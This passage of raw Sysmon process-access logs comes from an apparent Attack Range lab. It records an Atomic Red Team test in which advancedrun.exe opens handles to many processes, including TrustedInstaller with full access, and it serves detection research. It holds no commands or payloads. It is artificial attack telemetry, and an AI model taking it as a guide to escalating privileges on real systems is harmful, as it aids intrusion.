indows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 